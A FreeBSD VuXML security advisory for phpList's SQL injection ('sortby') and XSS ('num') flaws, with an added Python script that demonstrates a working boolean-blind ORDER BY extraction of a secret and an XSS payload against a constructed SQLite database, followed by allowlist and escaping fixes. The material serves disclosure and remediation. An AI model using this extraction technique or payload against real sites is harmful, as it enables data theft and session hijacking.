FreeBSD VuXML: Documenting security issues in FreeBSD and the FreeBSD Ports Collection

phpList -- SQL injection and XSS vulnerability

Affected packages
phplist <= 2.10.17

Details

VuXML ID fd8bac56-c444-11e1-864b-001cc0877741
Discovery 2012-03-21
Entry 2012-07-02

Zero Science Lab reports:

Input passed via the parameter 'sortby' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The param 'num' is vulnerable to an XSS issue where the attacker can execute arbitrary HTML and script code in a user's browser session in the context of an affected site.
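The following Python script is an added example; it is not phpList code and not part of the Zero Science Lab advisory. It models the two bug classes above against an in-memory SQLite database: a 'sortby' value spliced into an ORDER BY clause (the ORDER BY placement is an assumption, the advisory only says the parameter reaches SQL queries) and the 'num' value reflected into the page. Because a column name cannot be supplied as a bound parameter, the fix for 'sortby' is an allowlist of column names, not parameter binding; the script shows that a single ORDER BY expression is enough to read data blind through the order of the returned rows, then shows the allowlisted query and the output-encoded reflection. The table layout, column names, rows and the secret value are all constructed for the example.

```python
import html
import sqlite3

# Constructed sample data: a stand-in subscriber table and a secret the
# attacker wants to read. Names and values are assumptions, not phpList's schema.
SAMPLE_SUBSCRIBERS = [
    (1, "alice@example.org", "2012-03-01"),
    (2, "bob@example.org", "2012-03-02"),
    (3, "carol@example.org", "2012-03-03"),
]
SAMPLE_SECRET = "s3cr3t-token"


def make_db():
    """Builds an in-memory SQLite database holding the constructed tables."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE subscriber (id INTEGER, email TEXT, entered TEXT)")
    conn.execute("CREATE TABLE secret (apikey TEXT)")
    conn.executemany("INSERT INTO subscriber VALUES (?, ?, ?)", SAMPLE_SUBSCRIBERS)
    conn.execute("INSERT INTO secret VALUES (?)", (SAMPLE_SECRET,))
    return conn


def list_subscribers_vulnerable(conn, sortby):
    """Vulnerable pattern: the request parameter becomes part of the SQL text.
    A column name cannot be passed as a bound parameter, which is why code like
    this concatenates it, and why an allowlist (below) is the right fix."""
    sql = "SELECT id, email FROM subscriber ORDER BY " + sortby
    return conn.execute(sql).fetchall()


def order_oracle(conn, condition):
    """Boolean-based blind injection through ORDER BY: the injected CASE flips
    the sort direction when `condition` is true, so the id of the first row
    tells the attacker whether the condition held. No stacked statements,
    UNION or error messages are needed."""
    payload = "CASE WHEN (%s) THEN -id ELSE id END" % condition
    rows = list_subscribers_vulnerable(conn, payload)
    return rows[0][0] == 3


def blind_extract(conn, length):
    """Recovers the first `length` characters of secret.apikey one at a time."""
    charset = "abcdefghijklmnopqrstuvwxyz0123456789-"
    recovered = ""
    for pos in range(1, length + 1):  # SQLite substr() is 1-indexed
        for ch in charset:
            cond = "(SELECT substr(apikey, %d, 1) FROM secret) = '%s'" % (pos, ch)
            if order_oracle(conn, cond):
                recovered += ch
                break
        else:
            break  # character outside the charset: stop rather than guess
    return recovered


ALLOWED_SORT_COLUMNS = ("id", "email", "entered")


def is_valid_sort_column(sortby):
    """Allowlist check: only known column names may reach ORDER BY."""
    return sortby in ALLOWED_SORT_COLUMNS


def list_subscribers_fixed(conn, sortby):
    """Hardened form: reject anything that is not an allowlisted column name
    before it is spliced into the query text."""
    if not is_valid_sort_column(sortby):
        raise ValueError("invalid sortby value")
    sql = "SELECT id, email FROM subscriber ORDER BY " + sortby
    return conn.execute(sql).fetchall()


def render_num_vulnerable(num):
    """Reflected XSS: the 'num' value is written back into the page unescaped."""
    return '<input name="num" value="' + num + '">'


def render_num_fixed(num):
    """Output encoding: escape &, <, >, \" and ' before reflecting the value."""
    return '<input name="num" value="' + html.escape(num, quote=True) + '">'


if __name__ == "__main__":
    conn = make_db()
    print("normal:", list_subscribers_vulnerable(conn, "email"))
    print("extracted via ORDER BY oracle:", blind_extract(conn, len(SAMPLE_SECRET)))
    xss = '"><script>alert(1)</script>'
    print("vulnerable:", render_num_vulnerable(xss))
    print("fixed:     ", render_num_fixed(xss))
```

In the PHP that phpList is written in, the same two fixes are a lookup of the requested column against a fixed list of column names before building the ORDER BY clause, and htmlspecialchars() with ENT_QUOTES on any reflected value. For a parameter such as 'num' that is meant to be a count, casting it to an integer before use is tighter still, since it removes the need to reflect attacker-controlled text at all.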

References

Bugtraq ID 52657
CVE Name CVE-2012-2740
CVE Name CVE-2012-2741
URL http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5081.php
URL https://www.phplist.com/?lid=567